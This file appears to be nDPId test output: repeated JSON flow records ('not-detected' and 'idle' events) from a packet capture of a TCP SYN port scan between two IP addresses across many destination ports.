+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1942,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2718,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1942,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":823,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2717,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":823,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2717,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19101,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1980,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2718,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1980,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1897,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2725,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1897,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2725,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1955,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2725,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1955,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2725,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1041,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8873,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1041,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8873,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":683,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":683,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":35500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":35500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":683,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":683,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":35500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":35500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1846,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":687,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1846,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":687,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1915,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":687,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1915,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":687,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":691,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":691,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":691,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":691,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6839,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6839,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058656,"flow_last_seen":1278275058656,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6839,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058656,"flow_last_seen":1278275058656,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6839,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8888,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8888,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8888,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8888,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":700,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":700,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":700,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":700,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":950,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":705,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":950,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":705,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1005,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":705,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 